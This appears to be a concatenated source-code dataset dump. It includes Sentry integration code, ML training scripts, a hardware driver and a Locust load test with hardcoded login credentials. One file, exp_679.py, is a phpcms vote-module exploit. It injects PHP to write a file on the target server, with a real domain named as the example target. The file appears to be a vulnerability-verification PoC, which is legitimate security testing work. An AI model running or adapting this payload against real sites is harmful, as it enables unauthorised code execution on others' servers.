self.request_headers = {
"Authorization": get_basic_auth(account_email, api_token),
"Content-Type": "application/json",
}
def validate_api_access(self):
website_endpoint = WEBSITES_ENDPOINT.format(self.website_id)
try:
response = self._make_request(website_endpoint, "GET")
except requests.exceptions.ConnectionError:
raise InvalidApiUrlError
if response.status_code == requests.codes.UNAUTHORIZED:
raise UnauthorizedError
elif response.status_code == requests.codes.BAD_REQUEST:
raise InvalidWebsiteIdError
elif response.status_code == requests.codes.NOT_FOUND:
raise InvalidApiUrlError
response.raise_for_status()
def get_session_url(self, session_id, event_timestamp):
player_url = self.player_url + SESSION_URL_PATH + session_id
query_params = {}
query_params["source"] = DEFAULT_SENTRY_SOURCE
access_token = self._get_access_token(session_id)
if access_token is not None:
query_params["access_token"] = access_token
if event_timestamp is not None:
start_timestamp = self._get_session_start_timestamp(session_id)
if start_timestamp is not None:
pause_at = event_timestamp - start_timestamp
play_from = pause_at - MILLISECONDS_BEFORE_EVENT
query_params["pause_at"] = pause_at
query_params["play_from"] = play_from
return add_query_params(player_url, query_params)
def _get_access_token(self, session_id):
access_token = self._create_access_token(session_id)
if not access_token:
access_token = self._get_existing_access_token(session_id)
return access_token
def _get_existing_access_token(self, session_id):
response = self._make_access_tokens_request(session_id, "GET")
if response.status_code != requests.codes.OK:
return None
access_tokens = json.loads(response.content).get("data")
for token in access_tokens:
token_name = token.get("name")
if token_name == ACCESS_TOKEN_NAME:
return token.get("access_token")
return None
def _create_access_token(self, session_id):
response = self._make_access_tokens_request(
session_id=session_id, method="POST", body={"name": ACCESS_TOKEN_NAME}
)
if response.status_code != requests.codes.OK:
return None
return json.loads(response.content).get("access_token")
def _make_access_tokens_request(self, session_id, method, **kwargs):
access_tokens_endpoint = self._get_access_tokens_endpoint(session_id)
return self._make_request(access_tokens_endpoint, method, **kwargs)
def _get_access_tokens_endpoint(self, session_id):
return ACCESS_TOKENS_ENDPOINT.format(self.website_id, session_id)
def _get_session_start_timestamp(self, session_id):
endpoint = SESSION_ENDPOINT.format(self.website_id, session_id)
response = self._make_request(endpoint, "GET")
if response.status_code == requests.codes.OK:
return json.loads(response.content).get("client_start")
def _make_request(self, endpoint, method, **kwargs):
url = self.api_url + endpoint
request_kwargs = {"method": method, "headers": self.request_headers}
body = kwargs.get("body")
if body:
request_kwargs["json"] = body
return safe_urlopen(url, **request_kwargs)
class UnauthorizedError(Exception):
pass
class InvalidWebsiteIdError(Exception):
pass
class InvalidApiUrlError(Exception):
pass
|
[
"noreply@github.com"
] |
nagyist.noreply@github.com
|
3a4928e43a8d2eb7a9e58b5e4c3c04eee176b3f5
|
0798277f2706998ab80442ac931579eb47f676e5
|
/bin/metric-markdown
|
ed615b4e0809a60c37d486fe5df8f258f20d47d9
|
[
"Apache-2.0"
] |
permissive
|
isabella232/pulse-api-cli
|
49ed38b0694ab289802f69ee6df4911cf3378e3f
|
b01ca65b442eed19faac309c9d62bbc3cb2c098f
|
refs/heads/master
| 2023-03-18T00:23:15.295727
| 2016-05-13T15:44:08
| 2016-05-13T15:44:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 817
|
#!/usr/bin/env python
#
# Copyright 2015 BMC Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from boundary import MetricMarkdown
"""
Reads the plugin.json manifest file looks up the definition and then outputs a markdown table
"""
if __name__ == "__main__":
c = MetricMarkdown()
c.execute()
|
[
"davidg@boundary.com"
] |
davidg@boundary.com
|
|
68ed6146980626889998a60eed343f5932d5d1a2
|
7e792f54abea89609fcc1317dbbc6b50012c56ec
|
/main.py
|
a360c9b3b6cb6ff0e81fd6148244159ed17ed374
|
[] |
no_license
|
sylvanusm/Bert-abstractive-summarisation
|
067ba2a53ae8a2d5e99f5024c77f29b52eadd39d
|
4e56bf0b2188b9684f4b1c2d59e60c5f6b8c090e
|
refs/heads/main
| 2023-06-07T17:19:47.812248
| 2021-06-26T10:28:52
| 2021-06-26T10:28:52
| 380,363,935
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,647
|
py
|
from model.transformer import Summarizer
from model.common_layer import evaluate
from utils import config
import torch
import wandb
import torch.nn as nn
import torch.nn.functional as F
from tqdm import tqdm
import os
import time
import numpy as np
from utils.data import get_dataloaders, InputExample, InputFeatures
def count_parameters(model):
return sum(p.numel() for p in model.parameters() if p.requires_grad)
def train_draft():
train_dl, val_dl, test_dl, tokenizer = get_dataloaders(is_small=config.small)
if(config.test):
print("Test model",config.model)
model = Transformer(model_file_path=config.save_path,is_eval=True)
evaluate(model,data_loader_test,model_name=config.model,ty='test')
exit(0)
model = Summarizer(is_draft=True, toeknizer=tokenizer)
print("TRAINABLE PARAMETERS",count_parameters(model))
print("Use Cuda: ", config.USE_CUDA)
best_rouge = 0
cnt = 0
eval_iterval = 300
wandb.init(project=config.experiment, config={
"model_name": config.model_name,
"learning_rate": config.lr,
"batch_size": config.batch_size,
"hop": config.hop,
"heads": config.heads,
"epochs": config.epochs,
"beam_size": config.beam_size,
"emb_dim": config.emb_dim,
'cuda': config.USE_CUDA
})
conf = wandb.config
for e in range(config.epochs):
# model.train()
print("Epoch", e)
l = []
pbar = tqdm(enumerate(train_dl),total=len(train_dl))
for i, d in pbar:
loss = model.train_one_batch(d)
l.append(loss.item())
pbar.set_description("TRAIN loss:{:.4f}".format(np.mean(l)))
if i%eval_iterval==0:
# model.eval()
loss,r_avg, r1, r2, rl = evaluate(model,val_dl,model_name=config.model,ty="train")
wandb.log({"epoch": e,
"loss":loss,
"r_avg":r_avg,
"r1":r1,
"r2":r2,
"rl":rl})
# each epoch is long,so just do early stopping here.
if(r_avg > best_rouge):
best_rouge = r_avg
cnt = 0
model.save_model(loss,e,r_avg)
else:
cnt += 1
if(cnt > 20): break
# model.train()
# model.eval()
loss,r_avg, r1, r2, rl = evaluate(model,val_dl,model_name=config.model,ty="valid")
wandb.finish()
if __name__ == "__main__":
train_draft()
|
[
"sylvanusmahe@Sylvanuss-MacBook-Pro.local"
] |
sylvanusmahe@Sylvanuss-MacBook-Pro.local
|
63cf85af944332bdcc3cf505a3931ab50cb64c0f
|
600f361ac85c87dbc3a17cf3908dc0f4267a8c94
|
/quality-trim.py
|
2c2ac719751b4fb20d6f92a2f88d1c78ab76ac60
|
[] |
no_license
|
LeeBergstrand/Bioinformatics_scripts
|
801f00ea5d4346daf00f92d331f4a87737280ddd
|
0cfab04ecf43cf4f0aeba2d713532190cfc5eed1
|
refs/heads/master
| 2021-01-15T15:23:43.455647
| 2015-05-05T05:25:55
| 2015-05-05T05:25:55
| 19,826,979
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,170
|
py
|
#!/usr/bin/env python
import sys
import screed
import gzip
# python quality-trim.py <input fastq file> <output filtered fastq file>
# MINLENGTH is the minimum lenth of read desired. NCALLS is the percentage of a read with 'N' base calls for which if read has greater, it will be removed.
MINLENGTH = 30
filein = sys.argv[1]
fileout = sys.argv[2]
fw = open(fileout, 'w')
count=0
for n, record in enumerate(screed.open(filein)):
name = record['name']
sequence = record['sequence']
accuracy = record['accuracy']
sequence = sequence.rstrip('N')
accuracy = accuracy[:len(sequence)]
if 'N' in sequence:
continue
else:
trim = accuracy.find('B')
if trim > MINLENGTH or (trim == -1 and len(sequence) > MINLENGTH):
if trim == -1:
fw.write('@%s\n%s\n+\n%s\n' % (name, sequence, accuracy))
else:
fw.write('@%s\n%s\n+\n%s\n' % (name, sequence[:trim], accuracy[:trim]))
count += 1
if n % 1000 == 0:
print 'scanning', n
print 'Original Number of Reads', n + 1
print 'Final Number of Reads', count
print 'Total Filtered', n + 1 - int(count)
|
[
"carden24@mail.ubc.ca"
] |
carden24@mail.ubc.ca
|
d31bf01470b66161944add4d5f0c467767484f48
|
1a7ac4eb338f53e96f92c84d560fd1707607bcc9
|
/ENV/bin/jupyter
|
3897bd35c4d09274ecf81879fcf8337d7d1c9519
|
[] |
no_license
|
kuwar/data-science-python-1
|
cf3d04dbcf3e57fe6976be7e2f3371ee0eb3304f
|
2738d00cb339c250fdeca30ad84d9be7ca87e570
|
refs/heads/master
| 2022-10-18T09:15:56.181434
| 2019-09-10T06:39:44
| 2019-09-10T06:39:44
| 207,480,173
| 0
| 1
| null | 2022-10-13T06:11:52
| 2019-09-10T06:20:01
|
Python
|
UTF-8
|
Python
| false
| false
| 265
|
#!/home/saurav/Documents/GitHub/Python/second/ENV/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from jupyter_core.command import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"skuwar@olivemedia.co"
] |
skuwar@olivemedia.co
|
|
95d38eb622dd57ea6cf2bba55e5202edeb6e0e3b
|
43ff15a7989576712d0e51f0ed32e3a4510273c0
|
/tools/pocs/bugscan/exp_679.py
|
798104fb95f83ba1ff04752dfd711df064cc3623
|
[] |
no_license
|
v1cker/kekescan
|
f2b51d91a9d6496e2cdc767eb6a600171f513449
|
3daa1775648439ba9e0003a376f90b601820290e
|
refs/heads/master
| 2020-09-19T16:26:56.522453
| 2017-06-15T02:55:24
| 2017-06-15T02:55:24
| 94,495,007
| 6
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,954
|
py
|
# -*- coding: utf-8 -*-
from dummy import *
from miniCurl import Curl
curl = Curl()
# !/usr/bin/dev python
# -*- coding:utf-8 -*-
"""
reference:
http://www.wooyun.org/bugs/wooyun-2015-0104157
http://www.beebeeto.com/pdb/poc-2015-0086/
"""
import re
import urllib
import urllib2
import base64
import random
def get_vote_links(args):
vul_url = args
vote_url = '%sindex.php?m=vote' % vul_url
code, head, res, _, _ = curl.curl(vote_url)
ids = []
for miter in re.finditer(r'<a href=.*?subjectid=(?P<id>\d+)', res, re.DOTALL):
ids.append(miter.group('id'))
if len(ids) == 0:
return None
return list(set(ids))
def assign(service, args):
if service == 'phpcms':
return True, args
pass
def audit(args):
vul_url = args
ids = get_vote_links(args)
file_name = 'w2x5Tt_%s.php' % random.randint(1,3000)
base64_name = base64.b64encode(file_name)
if ids:
for i in ids:
exploit_url = '%sindex.php?m=vote&c=index&a=post&subjectid=%s&siteid=1' % (vul_url, i)
payload = {'subjectid': 1,
'radio[]': ');fputs(fopen(base64_decode(%s),w),"vulnerable test");' % base64_name}
post_data = urllib.urlencode(payload)
code,head,body,_,_=curl.curl('-d "%s" %s' % (post_data, exploit_url))
if code==200:
verify_url = '%sindex.php?m=vote&c=index&a=result&subjectid=%s&siteid=1' % (vul_url, i)
code,head,body,_,_=curl.curl(verify_url)
if code==200:
shell_url = '%s%s' % (vul_url, file_name)
code, head, res, _, _ = curl.curl(shell_url)
if code == 200 and 'vulnerable test' in res:
security_hole(vul_url)
if __name__ == "__main__":
from dummy import *
audit(assign('phpcms', 'http://www.jkb.com.cn/')[1])
|
[
"liyueke@huobi.com"
] |
liyueke@huobi.com
|
9907349705be2a4fdbc48e95c52054b00ad85246
|
4efcfcaec6cc956d15a1ae966905911809c4de18
|
/Supervised Deep Learning/Artificial Neural Networks (ANN)/artificial_neural_network.py
|
72ded64f7630ebf2867544dae348d8c8a1fe4aa0
|
[
"BSD-3-Clause"
] |
permissive
|
Nikhil-Xavier-DS/Deep-Learning-Algorithms-KERAS
|
9aa54eebaf688d83efa13767dd0e378339774e9c
|
7bbda3b1495d2e377abef2938c193afd34d95038
|
refs/heads/master
| 2020-03-28T09:00:22.535353
| 2018-09-09T08:30:32
| 2018-09-09T08:30:32
| 148,006,476
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,994
|
py
|
# Artificial Neural Network
# Import libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Import Dataset
dataset = pd.read_csv('Churn_Modelling.csv')
X = dataset.iloc[:,3: 13].values
y = dataset.iloc[:,13].values
# Encoding categorical data
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
labelencoder_X_1 = LabelEncoder()
X[:, 1] = labelencoder_X_1.fit_transform(X[:, 1])
labelencoder_X_2 = LabelEncoder()
X[:, 2] = labelencoder_X_2.fit_transform(X[:, 2])
onehotencoder = OneHotEncoder(categorical_features = [1])
X = onehotencoder.fit_transform(X).toarray()
X = X[:, 1:]
# Splitting into training set & test set
from sklearn.cross_validation import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)
# Feature scaling
from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
X_train = sc_X.fit_transform(X_train)
X_test = sc_X.transform(X_test)
# Let us make ANN
# Import Keras library
import keras
from keras.models import Sequential
from keras.layers import Dense
# Initializing ANN
classifier = Sequential()
# Adding Input layer and First hidden layer
classifier.add(Dense(output_dim = 6, init = 'uniform', activation = 'relu', input_dim = 11))
# Adding Second hidden layer
classifier.add(Dense(output_dim = 6, init = 'uniform', activation = 'relu'))
# Adding Output layer
classifier.add(Dense(output_dim = 1, init = 'uniform', activation = 'sigmoid'))
# Compiling ANN
classifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])
# Fit ANN to training set
classifier.fit(X_train, y_train, batch_size = 10, epochs = 100)
# Predict and evaluate model
y_pred = classifier.predict(X_test)
for i in range(0, len(y_pred)):
if(y_pred[i] >= 0.5):
y_pred[i] = True
else:
y_pred[i] = False
# Confusion Matrix
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_pred)
cm
|
[
"nikhilxavier@yahoo.com"
] |
nikhilxavier@yahoo.com
|
f898a507fb5c8d1476d837dc594f7b5fa3b68cd6
|
b80b3b82bb1f4c4019e56bf6eed859d9e1ec024b
|
/python/tolower.py
|
4b443cc2001eef828e7353d23079405cbb61b962
|
[] |
no_license
|
NotaCSstudent/leetcode
|
be484537f20302557411ed0a2d653703b4c86abe
|
13c3fc89e492209f70fcb8e7756c8553f5736a1e
|
refs/heads/main
| 2023-06-08T22:59:41.680890
| 2021-06-20T13:37:46
| 2021-06-20T13:37:46
| 372,983,624
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 106
|
py
|
class Solution:
def toLowerCase(self, s: str) -> str:
s = s.lower()
return s
|
[
"noreply@github.com"
] |
NotaCSstudent.noreply@github.com
|
31508bdac6628284abbbd3294418d6af5c325c67
|
b8d5270f2af049e795d02887fbe322054b82f600
|
/SC16IS750.py
|
28bdf44a54e2501340f0142873eca248d24d6733
|
[] |
no_license
|
Harri-Renney/SC16IS750
|
1d73c42aa7fbec05413d7c2e7ea4fca2477e799c
|
8da36a31ca930ea88af2e73cce6ea163bda3ba25
|
refs/heads/master
| 2021-08-18T05:26:22.753747
| 2020-03-26T20:58:12
| 2020-03-26T20:58:12
| 141,274,557
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,484
|
py
|
import smbus
from enum import IntEnum
class SC16IS750:
self.DEVICE_ADDRESS = 0x9A
CrystalFrequency = 0
class registers(IntEnum):
RHR= 0x00 # Receive Holding Register (R)
THR= 0x00 # Transmit Holding Register (W)
IER= 0x01 # Interrupt Enable Register (R/W)
FCR= 0x02 # FIFO Control Register (W)
IIR= 0x02 # Interrupt Identification Register (R)
LCR= 0x03 # Line Control Register (R/W)
MCR= 0x04 # Modem Control Register (R/W)
LSR= 0x05 # Line Status Register (R)
MSR= 0x06 # Modem Status Register (R)
SPR= 0x07 # Scratchpad Register (R/W)
TCR= 0x06 # Transmission Control Register (R/W)
TLR= 0x07 # Trigger Level Register (R/W)
TXLVL = 0x08 # Transmit FIFO Level Register (R)
RXLVL = 0x09 # Receive FIFO Level Register (R)
IODIR= 0x0A # I/O pin Direction Register (R/W)
IOSTATE= 0x0B # I/O pin States Register (R)
IOINTENA= 0x0C # I/O Interrupt Enable Register (R/W)
IOCONTROL= 0x0E # I/O pins Control Register (R/W)
EFCR= 0x0F # Extra Features Register (R/W)
# -- Special Register Set (Requires LCR[7] = 1 & LCR != 0xBF to use)
DLL= 0x00 # Divisor Latch LSB (R/W)
DLH= 0x01 # Divisor Latch MSB (R/W)
# -- Enhanced Register Set (Requires LCR = 0xBF to use)
EFR= 0x02 # Enhanced Feature Register (R/W)
XON1= 0x04 # XOn1 (R/W)
XON2= 0x05 # XOn2 (R/W)
XOFF1= 0x06 # XOff1 (R/W)
XOFF2= 0x07 # XOff2 (R/W)
def init(self, crystalFrequency, deviceaddress=0x9A):
print("Initalising SC16IS750.")
self.DEVICE_ADDRESS = deviceaddress
self.bus = smbus.SMBus(1)
self.crystalFrequency = crystalFrequency
# def __init__():
def readRegister(self, registerAddress):
shiftedDeviceAddress = self.DEVICE_ADDRESS >> 1
shiftedRegisterAddress = registerAddress << 3
registerReadValue = self.bus.read_byte_data(shiftedDeviceAddress, shiftedRegisterAddress)
return registerReadValue
def writeRegister(self, registerAddress, data):
shiftedDeviceAddress = self.DEVICE_ADDRESS >> 1
shiftedRegisterAddress = registerAddress << 3
self.bus.write_byte_data(shiftedDeviceAddress, shiftedRegisterAddress, data)
##Set the desired baudrate of chips UART##
def setBaudrate(self, baudrate):
clockDivisor = (self.readRegister(self.registers.MCR) & 0b10000000) >> 7
if(clockDivisor == 0):
prescaler = 1
elif(clockDivisor == 1):
prescaler = 4
divisor = int((self.crystalFrequency / prescaler) / (baudrate * 16))
lowerDivisor = (divisor & 0xFF)
higherDivisor = (divisor & 0xFF00) >> 8
self.setRegisterBit(self.registers.LCR, 7)
self.writeRegister(self.registers.DLL, lowerDivisor)
self.writeRegister(self.registers.DLH, higherDivisor)
self.unsetRegisterBit(self.registers.LCR, 7)
##Set the desired UART attributes##
def setUARTAttributes(self, dataBits, parityType, stopBits):
#Calculate bits for LCR register#
print("Setting UART attributes.")
##Set the bit in position passed##
def setRegisterBit(self, registerAddress, registerBit):
current = self.readRegister(registerAddress)
updated = current | (1 << registerBit)
self.writeRegister(registerAddress, updated)
##Unset the bit in position passed##
def unsetRegisterBit(self, registerAddress, registerBit):
current = self.readRegister(registerAddress)
updated = current & ~(1 << registerBit)
self.writeRegister(registerAddress, updated)
##Checks if any data in FIFO buffer##
def isDataWaiting(self):
register = self.readRegister(self.registers.LSR)
isWaiting = register & 0b1
if(isWaiting):
return True
return False
##Checks number of bytes waiting in FIFO buffer##
def dataWaiting(self):
return self.readRegister(self.registers.RXLVL)
##Writes to Scratch register and checks successful##
def testChip(self):
self.writeRegister(self.registers.SPR, 0xFF)
if(self.readRegister(self.registers.SPR) != 0xFF):
return False
return True
|
[
"harri.renney@blino.co.uk"
] |
harri.renney@blino.co.uk
|
7f7bc5dacb84f4e18c258d76fd91a9bb8cc3af3b
|
54f352a242a8ad6ff5516703e91da61e08d9a9e6
|
/Source Codes/CodeJamData/12/23/12.py
|
da0396d4cf15e8267cd6d9041247bc41bc9c3b63
|
[] |
no_license
|
Kawser-nerd/CLCDSA
|
5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb
|
aee32551795763b54acb26856ab239370cac4e75
|
refs/heads/master
| 2022-02-09T11:08:56.588303
| 2022-01-26T18:53:40
| 2022-01-26T18:53:40
| 211,783,197
| 23
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,511
|
py
|
# -*- coding:utf-8 -*-
import os, itertools
curr_dir = os.path.dirname(os.path.abspath(__file__))
srcfilename = os.path.join(curr_dir, 'C-large.in')
dstfilename = os.path.join(curr_dir, 'output.txt')
def solve(numbers_):
numbers = sorted(numbers_)
memory = dict((k, [k]) for k in numbers)
for r in xrange(2, len(numbers)):
combinations = itertools.combinations(numbers, r)
for combination in combinations:
s = sum(combination)
if s in memory:
r1 = memory[s]
r2 = combination
return r1, r2
memory[s] = combination
return 'Impossible'
if __name__ == '__main__':
with open(srcfilename, 'rb') as inp:
with open(dstfilename, 'wb') as outp:
lines = inp.readlines()
count = int(lines.pop(0))
outlines = []
for i in xrange(count):
line = lines[i]
numbers = [int(number) for number in line.split(' ')]
numbers.pop(0)
result = solve(numbers)
if result == 'Impossible':
outlines.append('Case #%d: Impossible\n' % (i+1,))
else:
r1, r2 = result
outlines.append('Case #%d:\n' % (i+1,))
outlines.append('%s\n' % ' '.join(['%d' % r1i for r1i in r1]))
outlines.append('%s\n' % ' '.join(['%d' % r2i for r2i in r2]))
outp.writelines(outlines)
|
[
"kwnafi@yahoo.com"
] |
kwnafi@yahoo.com
|
db3d9f7ffa0daf93dc6ef9d1b818888be5ac8e5d
|
93afa6da4a41e6346079cf437aa11fe27ae84d93
|
/venv/bin/easy_install
|
c86211b025ea693cb90960dd17d613e34059f37e
|
[] |
no_license
|
alexbatashev/rungekutta
|
20695e3d0706b7cfde2f7b4c0150e74122b4a6d5
|
7c71228b6bbbeebe0771b45e4d85c342f2d2fdd7
|
refs/heads/master
| 2020-05-05T06:56:03.982750
| 2019-04-07T08:29:28
| 2019-04-07T08:29:28
| 179,806,651
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 454
|
#!/Users/aleksandrbatasev/PycharmProjects/rungekutta/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install')()
)
|
[
"alexbatashev@outlook.com"
] |
alexbatashev@outlook.com
|
|
04aaeca81365d84683d423d2113d3dca18c1ddb6
|
6451afeb63ae2be4974cab898e1f72d3d5633d72
|
/gmailsync/utils.py
|
fc8018f7c83296daadc1a88c73cf96d850af8835
|
[
"Apache-2.0"
] |
permissive
|
albertoalcolea/gmailsync
|
f8fb8bd6bee3911482b6ef64f99d714682405938
|
cf2c1f074c24234284e1cfc2949341df1a9899ba
|
refs/heads/master
| 2022-05-02T22:40:46.881024
| 2022-04-14T17:08:28
| 2022-04-14T17:08:28
| 217,107,647
| 4
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 504
|
py
|
import itertools
import os
def chunked(iterable, size):
it = iter(iterable)
while True:
chunk = tuple(itertools.islice(it, size))
if not chunk:
break
yield chunk
def expand_path(path):
"""
Convert relative paths to absolute paths expanding environment variables, and '~' to
represent the user $HOME directory in filenames.
:param path: path to be expanded.
"""
return os.path.abspath(os.path.expandvars(os.path.expanduser(path)))
|
[
"albertoalcolea@gmail.com"
] |
albertoalcolea@gmail.com
|
a99dbfd23d95657ed987f929ac6e3d4f7fd948f8
|
a64f122dd4df3e20bc3e25aca31bb11ec9d55977
|
/Assignment 3/ICA.py
|
507e0eba4db4d38a810c8e4fc5190d3e25708cc8
|
[] |
no_license
|
mbrine555/gatech_ML
|
f9de5e1e1c29e40693030fcf3dce4797339f3ada
|
2a3dea874ac7710104fb891a5199afa9f3c046af
|
refs/heads/master
| 2020-04-16T10:39:44.328425
| 2019-04-10T11:54:37
| 2019-04-10T11:54:37
| 165,512,336
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,002
|
py
|
#%% Imports
import pandas as pd
import numpy as np
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import Pipeline
from helpers import nn_arch, nn_reg
from sklearn.neural_network import MLPClassifier
from sklearn.model_selection import GridSearchCV
from sklearn.decomposition import FastICA
out = './ICA/'
np.random.seed(0)
digits = pd.read_hdf('./BASE/datasets.hdf','digits')
digitsX = digits.drop('Class',1).copy().values
digitsY = digits['Class'].copy().values
madelon = pd.read_hdf('./BASE/datasets.hdf','madelon')
madelonX = madelon.drop('Class',1).copy().values
madelonY = madelon['Class'].copy().values
madelonX = StandardScaler().fit_transform(madelonX)
digitsX= StandardScaler().fit_transform(digitsX)
clusters = [2,5,10,15,20,25,30,35,40]
dims = [2,3,4,5,6,7,8,9,10,11]
#raise
#%% data for 1
ica = FastICA(random_state=5)
kurt = {}
for dim in dims:
ica.set_params(n_components=dim)
tmp = ica.fit_transform(madelonX)
tmp = pd.DataFrame(tmp)
tmp = tmp.kurt(axis=0)
kurt[dim] = tmp.abs().mean()
kurt = pd.Series(kurt)
kurt.to_csv(out+'madelon scree.csv')
dims = [2,5,10,15,20,25,30,35,40,45,50,55,60]
ica = FastICA(random_state=5)
kurt = {}
for dim in dims:
ica.set_params(n_components=dim)
tmp = ica.fit_transform(digitsX)
tmp = pd.DataFrame(tmp)
tmp = tmp.kurt(axis=0)
kurt[dim] = tmp.abs().mean()
kurt = pd.Series(kurt)
kurt.to_csv(out+'digits scree.csv')
raise
#%% Data for 2
grid ={'ica__n_components':dims,'NN__alpha':nn_reg,'NN__hidden_layer_sizes':nn_arch}
ica = FastICA(random_state=5)
mlp = MLPClassifier(activation='relu',max_iter=2000,early_stopping=True,random_state=5)
pipe = Pipeline([('ica',ica),('NN',mlp)])
gs = GridSearchCV(pipe,grid,verbose=10,cv=5)
gs.fit(madelonX,madelonY)
tmp = pd.DataFrame(gs.cv_results_)
tmp.to_csv(out+'Madelon dim red.csv')
grid ={'ica__n_components':dims,'NN__alpha':nn_reg,'NN__hidden_layer_sizes':nn_arch}
ica = FastICA(random_state=5)
mlp = MLPClassifier(activation='relu',max_iter=2000,early_stopping=True,random_state=5)
pipe = Pipeline([('ica',ica),('NN',mlp)])
gs = GridSearchCV(pipe,grid,verbose=10,cv=5)
gs.fit(digitsX,digitsY)
tmp = pd.DataFrame(gs.cv_results_)
tmp.to_csv(out+'digits dim red.csv')
raise
#%% data for 3
# Set this from chart 2 and dump, use clustering script to finish up
dim = 45
ica = FastICA(n_components=dim,random_state=10)
madelonX2 = ica.fit_transform(madelonX)
madelon2 = pd.DataFrame(np.hstack((madelonX2,np.atleast_2d(madelonY).T)))
cols = list(range(madelon2.shape[1]))
cols[-1] = 'Class'
madelon2.columns = cols
madelon2.to_hdf(out+'datasets.hdf','madelon',complib='blosc',complevel=9)
dim = 60
ica = FastICA(n_components=dim,random_state=10)
digitsX2 = ica.fit_transform(digitsX)
digits2 = pd.DataFrame(np.hstack((digitsX2,np.atleast_2d(digitsY).T)))
cols = list(range(digits2.shape[1]))
cols[-1] = 'Class'
digits2.columns = cols
digits2.to_hdf(out+'datasets.hdf','digits',complib='blosc',complevel=9)
|
[
"briner.15@osu.edu"
] |
briner.15@osu.edu
|
74d2f041b4f2ac6cdb869ee1926db295164b1264
|
4b6fc63aecf127806b34998cdaef0f7342514dcd
|
/Stress/SIGI_Fase_1/Defensor.py
|
0d84b621c51b08e4bfe546158149c1af5667da44
|
[
"CC0-1.0"
] |
permissive
|
VictorAdad/sigi-api-adad
|
08365166f0443cc5f2c90fa792a63998e185f3f1
|
412511b04b420a82cf6ae5338e401b181faae022
|
refs/heads/master
| 2021-04-29T14:27:21.807529
| 2018-02-16T17:42:04
| 2018-02-16T17:42:04
| 121,772,079
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,978
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
from locust import HttpLocust, TaskSet, task
from requests_toolbelt import MultipartEncoder
from random import randrange
import requests
import mysql.connector
from mysql.connector import errorcode
import variables
import time
url = variables.url #cambiar formato de url si es necesario (agregar / o cadena vacia)
documentos = variables.documentos
def login(self):
time.sleep(3)
self.client.post(url+"login", {"nombreUsuario":"ana.martinez", "password":"secret"})
print "DEFENSOR LOGIN"
def index(self):
self.client.get(url)
self.wait()
def verMisDefensas(self):
index(self)
time.sleep(3)
print("Ver mis Defensas")
self.client.get(url+"defensa/abogado")
self.wait()
def verDetalleDefensa(self):
idDefensa = findDefensa()
print("Ver Detalle de la defensa: "+str(idDefensa))
if idDefensa!=0:
self.client.get(url+"defensa/"+idDefensa)
self.wait()
def crearEtapasProcesales(self, idDefensa):
print("Crear la etapas procesales")
#audienciaInicial(self, idDefensa, "Control Detención - Audiencia Inicial", "controlDetencion/new/"+idDefensa)
#otrasAudiencias(self, idDefensa, "Otras Audiencias", "audiencia/new/"+idDefensa+"/E")
#acusacion(self, idDefensa, "Acusacion", "acusacion/new/"+idDefensa)
options = randrange(1,4)
print("ETAPA NUMERO: "+str(options))
options = {
1 : audienciaInicial(self, idDefensa, "Control Detención - Audiencia Inicial", "controlDetencion/new/"+str(idDefensa)),
2 : otrasAudiencias(self, idDefensa, "Otras Audiencias", "audiencia/new/"+idDefensa+"/E"),
3 : acusacion(self, idDefensa, "Acusacion", "acusacion/new/"+idDefensa)
}
self.wait()
def audienciaInicial(self, idDefensa, etapa, urlEtapa):
print("Crear la Etapa Procesal: "+etapa+" Para la defensa: "+str(idDefensa))
self.client.get(url+urlEtapa)
i = randrange(0,6)
print("Sube Documento "+documentos[i][0])
m = MultipartEncoder(
fields={
"fecha":"18/07/2016",
"hora":"16:00",
"tipoAudiencia":"Inicial",
"antecedente":"false",
"action":"Crear",
"documentos": (documentos[i][0], open('Files/'+documentos[i][0], 'rb'),documentos[i][1])
})
time.sleep(3)
self.client.post(url+"controlDetencion/"+idDefensa, data = m, headers={'Content-Type': m.content_type})
self.wait()
def otrasAudiencias(self, idDefensa, etapa, urlEtapa):
print("Crear la Etapa Procesal: "+etapa+" Para la defensa: "+str(idDefensa))
self.client.get(url+urlEtapa)
i = randrange(0,4)
print("Sube Documento "+documentos[i][0])
m = MultipartEncoder(
fields={
"clasificacion": "E",
"tipoAudiencia": "Intermedia",
"organoJurisdiccional.id":"10027",
